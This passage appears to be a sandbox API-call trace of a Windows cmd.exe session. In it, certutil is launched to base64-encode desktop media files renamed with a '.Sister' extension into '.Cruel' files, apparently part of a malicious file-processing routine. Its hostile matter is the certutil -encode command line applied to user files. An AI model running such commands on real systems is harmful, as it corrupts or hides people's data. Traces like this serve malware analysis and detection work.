0x21ed8c7cee0 [0231.476] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0231.476] _wcsnicmp (_String1="JYNRMP~1.SIS", _String2="JyNR.mp3.Sister", _MaxCount=0xf) returned 63 [0231.476] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0231.476] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0231.476] GetProcessHeap () returned 0x21ed8c70000 [0231.477] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45cb0 [0231.477] ??_V@YAXPEAX@Z () returned 0x1 [0231.477] ??_V@YAXPEAX@Z () returned 0x1 [0231.477] GetProcessHeap () returned 0x21ed8c70000 [0231.477] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68bc0, Size=0x170) returned 0x21ed8d68bc0 [0231.480] GetProcessHeap () returned 0x21ed8c70000 [0231.480] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68bc0) returned 0x170 [0231.480] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0231.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.480] GetFileType (hFile=0x50) returned 0x2 [0231.480] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0231.480] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0231.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.507] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0231.519] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0231.519] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0231.519] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0231.519] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0231.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.519] GetFileType (hFile=0x50) returned 0x2 [0231.519] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0231.519] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0231.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.547] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0231.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.565] GetFileType (hFile=0x50) returned 0x2 [0231.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0231.565] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0231.571] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.571] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d68b60*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d68b60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0231.607] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"JyNR.mp3.Sister\" \"JyNR.mp3.Cruel\" ") returned 44 [0231.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.607] GetFileType (hFile=0x50) returned 0x2 [0231.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0231.607] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0231.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.609] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x2c) returned 1 [0231.609] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0231.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.609] GetFileType (hFile=0x50) returned 0x2 [0231.610] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0231.610] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0231.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.634] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0231.648] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0231.676] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0231.676] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0231.676] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0231.676] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0231.676] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0231.676] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0231.676] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0231.676] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0231.676] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0231.676] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0231.676] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0231.676] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0231.676] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0231.676] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0231.676] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0231.677] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0231.677] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0231.677] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0231.677] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0231.677] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0231.677] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0231.677] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0231.677] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0231.677] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0231.677] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0231.677] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0231.677] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0231.677] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0231.677] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0231.677] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0231.677] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0231.677] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0231.677] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0231.677] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0231.677] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0231.677] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0231.677] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0231.677] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0231.677] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0231.677] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0231.678] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0231.678] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0231.678] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0231.678] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0231.678] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0231.678] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0231.678] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0231.678] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0231.678] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0231.678] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0231.678] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0231.678] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0231.678] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0231.678] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0231.678] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0231.678] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0231.678] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0231.678] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0231.678] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0231.678] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0231.678] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0231.678] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0231.678] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0231.678] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0231.678] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0231.679] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0231.679] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0231.679] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0231.679] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0231.679] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0231.679] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0231.679] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0231.679] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0231.679] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0231.679] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0231.679] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0231.679] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0231.679] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0231.679] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0231.679] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0231.679] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0231.679] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0231.679] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0231.679] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0231.679] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0231.679] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0231.679] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0231.679] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0231.679] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0231.679] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0231.679] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0231.680] ??_V@YAXPEAX@Z () returned 0x1 [0231.680] GetProcessHeap () returned 0x21ed8c70000 [0231.680] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92b11b0 [0231.680] GetProcessHeap () returned 0x21ed8c70000 [0231.680] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7a) returned 0x21ed93791e0 [0231.680] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0231.680] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0231.680] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0231.680] GetProcessHeap () returned 0x21ed8c70000 [0231.680] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed92c11a0 [0231.681] SetErrorMode (uMode=0x0) returned 0x0 [0231.682] SetErrorMode (uMode=0x1) returned 0x0 [0231.682] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed92c11b0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0231.682] SetErrorMode (uMode=0x0) returned 0x1 [0231.682] GetProcessHeap () returned 0x21ed8c70000 [0231.682] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92c11a0, Size=0x52) returned 0x21ed92c11a0 [0231.682] GetProcessHeap () returned 0x21ed8c70000 [0231.682] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92c11a0) returned 0x52 [0231.682] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0231.682] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0231.682] GetProcessHeap () returned 0x21ed8c70000 [0231.682] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d60120 [0231.682] GetProcessHeap () returned 0x21ed8c70000 [0231.682] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c78810 [0231.682] GetProcessHeap () returned 0x21ed8c70000 [0231.682] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78810, Size=0x1be) returned 0x21ed8c78810 [0231.682] GetProcessHeap () returned 0x21ed8c70000 [0231.682] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78810) returned 0x1be [0231.682] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.682] GetProcessHeap () returned 0x21ed8c70000 [0231.682] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c76540 [0231.682] GetProcessHeap () returned 0x21ed8c70000 [0231.683] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c76540, Size=0x7e) returned 0x21ed8c76540 [0231.683] GetProcessHeap () returned 0x21ed8c70000 [0231.683] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c76540) returned 0x7e [0231.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.683] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0231.683] GetLastError () returned 0x2 [0231.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.683] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0231.684] GetLastError () returned 0x2 [0231.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.684] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cb80 [0231.684] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0231.684] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0231.684] GetLastError () returned 0x2 [0231.684] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cb80 [0231.685] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0231.685] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0231.685] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0231.685] ??_V@YAXPEAX@Z () returned 0x1 [0231.685] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0231.706] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0231.706] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0231.706] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0231.706] GetProcessHeap () returned 0x21ed8c70000 [0231.706] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45ce0 [0231.706] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0231.706] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0231.706] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0231.707] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0231.708] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0231.708] GetProcessHeap () returned 0x21ed8c70000 [0231.708] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45ce0) returned 1 [0231.708] GetProcessHeap () returned 0x21ed8c70000 [0231.708] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95560 [0231.708] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0231.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0231.708] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0231.709] _get_osfhandle (_FileHandle=0) returned 0x4c [0231.709] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0231.709] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"JyNR.mp3.Sister\" \"JyNR.mp3.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"JyNR.mp3.Sister\" \"JyNR.mp3.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"JyNR.mp3.Sister\" \"JyNR.mp3.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x55c, dwThreadId=0xe9c)) returned 1 [0231.721] CloseHandle (hObject=0xa8) returned 1 [0231.721] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0231.721] GetProcessHeap () returned 0x21ed8c70000 [0231.721] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0231.721] GetEnvironmentStringsW () returned 0x21ed9980080* [0231.721] GetProcessHeap () returned 0x21ed8c70000 [0231.722] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0231.722] FreeEnvironmentStringsA (penv="=") returned 1 [0231.722] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0233.400] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0233.400] CloseHandle (hObject=0xa4) returned 1 [0233.400] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0233.400] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0233.400] GetProcessHeap () returned 0x21ed8c70000 [0233.400] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0233.400] GetEnvironmentStringsW () returned 0x21ed93b0130* [0233.400] GetProcessHeap () returned 0x21ed8c70000 [0233.400] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed9980080 [0233.400] FreeEnvironmentStringsA (penv="=") returned 1 [0233.400] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0233.400] GetProcessHeap () returned 0x21ed8c70000 [0233.401] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0233.401] GetEnvironmentStringsW () returned 0x21ed9980080* [0233.401] GetProcessHeap () returned 0x21ed8c70000 [0233.401] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0233.401] FreeEnvironmentStringsA (penv="=") returned 1 [0233.401] GetProcessHeap () returned 0x21ed8c70000 [0233.401] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95560) returned 1 [0233.401] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0233.401] ??_V@YAXPEAX@Z () returned 0x1 [0233.401] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a81feb0, ftCreationTime.dwHighDateTime=0x1d5e999, ftLastAccessTime.dwLowDateTime=0x3ad49150, ftLastAccessTime.dwHighDateTime=0x1d5e64c, ftLastWriteTime.dwLowDateTime=0x3ad49150, ftLastWriteTime.dwHighDateTime=0x1d5e64c, nFileSizeHigh=0x0, nFileSizeLow=0x63c2, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="KoSrfJhDHVv1O_ 2.m4a.Sister", cAlternateFileName="")) returned 1 [0233.401] GetProcessHeap () returned 0x21ed8c70000 [0233.401] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0c80, Size=0x35e) returned 0x21ed8c789e0 [0233.401] 